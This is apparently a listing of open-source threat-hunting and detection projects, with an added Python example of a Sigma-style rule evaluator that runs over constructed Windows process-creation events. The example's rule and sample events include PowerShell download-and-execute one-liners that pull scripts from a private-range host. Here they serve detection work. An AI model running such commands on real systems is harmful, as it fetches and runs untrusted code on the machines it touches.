Repository intended to allow users to leverage site fingerprints within their environments for threat detection and threat hunting
Updated Jun 3, 2024
Automatically created C2 Feeds
Hayabusa (隼) is a Sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
Suricata is a network intrusion detection system (IDS), intrusion prevention system (IPS) and network security monitoring (NSM) engine developed by the OISF and the Suricata community.
Set of Sigma rules (>320) mapped to MITRE ATT&CK tactics and techniques
🔍🔍 Malware scanner for cloud-native environments, as part of CI/CD and at runtime 🔍🔍
Live Feed of C2 servers, tools, and botnets
IntelOwl: manage your Threat Intelligence at scale
Clusters and elements to attach to MISP events or attributes (like threat actors)
Covers various security approaches to attack techniques and also provides new findings about security breaches.
Harness the power of Splunk for your investigations
Threat Hunting Toolkit is a Swiss Army knife for threat hunting, log processing, and security-focused data science
Threat Hunting queries for various attacks
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It includes our own interfaces for alerting, dashboards, hunting, PCAP, and case management. It also includes other tools such as Playbook, osquery, CyberChef, Elasticsearch, Logstash, Kibana, Suricata, and Zeek.
Anvilogic Forge
Awesome list of keywords and artifacts for Threat Hunting sessions
YARA detection rules for hunting with the threathunting-keywords project
Sigma detection rules for hunting with the threathunting-keywords project
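Several of the projects above (Hayabusa, the ATT&CK-mapped rule set, and the threathunting-keywords Sigma rules) share one mechanism: a Sigma rule's named selections are matched against each log record and combined by the rule's condition, and a hit is tagged with the ATT&CK technique from the rule's tags. The following is an added example, not code from any of the listed projects, that implements a small subset of Sigma semantics (field/value selections, the |contains, |startswith and |endswith modifiers, Sigma's default case-insensitive string matching, and and/or/not conditions with parentheses) and runs one rule over a constructed set of process-creation events. The rule, the event records, and the user names in them are made up for the example.

```python
"""Minimal Sigma-style rule evaluator over constructed Windows process-creation events.

Added example; not code from Hayabusa or any other listed project. Only a subset of
Sigma is implemented: plain field/value selections, list values (OR-ed), the
contains/startswith/endswith modifiers, and a condition made of selection names
combined with and/or/not and parentheses. Matching is case-insensitive, as in Sigma.
"""
import re

# Constructed rule in the shape of a Sigma rule (dict form, as if loaded from YAML).
RULE = {
    "title": "Suspicious PowerShell download cradle",
    "tags": ["attack.execution", "attack.t1059.001"],
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "IEX", "Invoke-Expression"],
        },
        "filter_admin": {"User": "DOMAIN\\svc_patch"},  # hypothetical patching account
        "condition": "selection and not filter_admin",
    },
}

# Constructed sample events (Sysmon Event ID 1 shape); not real telemetry.
EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')",
     "User": "DOMAIN\\jdoe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -File C:\\Scripts\\patch.ps1",
     "User": "DOMAIN\\svc_patch"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c IEX (iwr http://10.0.0.5/b.ps1)",
     "User": "DOMAIN\\svc_patch"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c whoami", "User": "DOMAIN\\jdoe"},
]


def value_matches(actual, expected, modifier):
    """Compare one field value against one expected value under a Sigma modifier."""
    a, e = str(actual).lower(), str(expected).lower()
    if modifier == "contains":
        return e in a
    if modifier == "startswith":
        return a.startswith(e)
    if modifier == "endswith":
        return a.endswith(e)
    return a == e


def selection_matches(selection, event):
    """Every field in a selection must match (AND); a list of values is OR-ed."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        values = expected if isinstance(expected, list) else [expected]
        if not any(value_matches(event[field], v, modifier) for v in values):
            return False
    return True


def eval_condition(condition, truth):
    """Evaluate a Sigma condition string given the truth value of each selection name.

    Recursive descent over or / and / not / parentheses (lowest to highest precedence).
    """
    tokens = re.findall(r"\(|\)|[\w*]+", condition)
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def expr():  # or-level
        nonlocal pos
        result = term()
        while peek() == "or":
            pos += 1
            rhs = term()  # always consume the right operand, no short-circuit
            result = result or rhs
        return result

    def term():  # and-level
        nonlocal pos
        result = factor()
        while peek() == "and":
            pos += 1
            rhs = factor()
            result = result and rhs
        return result

    def factor():  # not, parentheses, or a selection name
        nonlocal pos
        tok = peek()
        if tok == "not":
            pos += 1
            return not factor()
        if tok == "(":
            pos += 1
            result = expr()
            if peek() != ")":
                raise ValueError("unbalanced parentheses in condition")
            pos += 1
            return result
        if tok is None or tok in ("and", "or", ")"):
            raise ValueError(f"unexpected token {tok!r} in condition")
        pos += 1
        if tok not in truth:
            raise ValueError(f"unknown selection {tok!r} in condition")
        return truth[tok]

    result = expr()
    if pos != len(tokens):
        raise ValueError("trailing tokens in condition")
    return result


def run_rule(rule, events):
    """Return (event, ATT&CK technique tags) for each event satisfying the rule."""
    detection = rule["detection"]
    selections = {k: v for k, v in detection.items() if k != "condition"}
    techniques = [t for t in rule.get("tags", []) if t.startswith("attack.t")]
    hits = []
    for event in events:
        truth = {name: selection_matches(sel, event) for name, sel in selections.items()}
        if eval_condition(detection["condition"], truth):
            hits.append((event, techniques))
    return hits


if __name__ == "__main__":
    for event, techniques in run_rule(RULE, EVENTS):
        print(f"[{', '.join(techniques)}] {event['User']}: {event['CommandLine']}")
```

Against the constructed events, only the first record is reported: the third also contains the download cradle but is excluded by the filter for the patching account, which is exactly the allow-listing pattern that `selection and not filter` expresses in real Sigma rules. Real-world rule engines additionally handle wildcards, regex and base64 modifiers, aggregation conditions and log-source-specific field mappings, none of which this subset covers.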
An open-source library that lets software query data repositories using STIX Patterning and return the results as STIX Observations.
Scirius is a web application for Suricata ruleset management and threat hunting.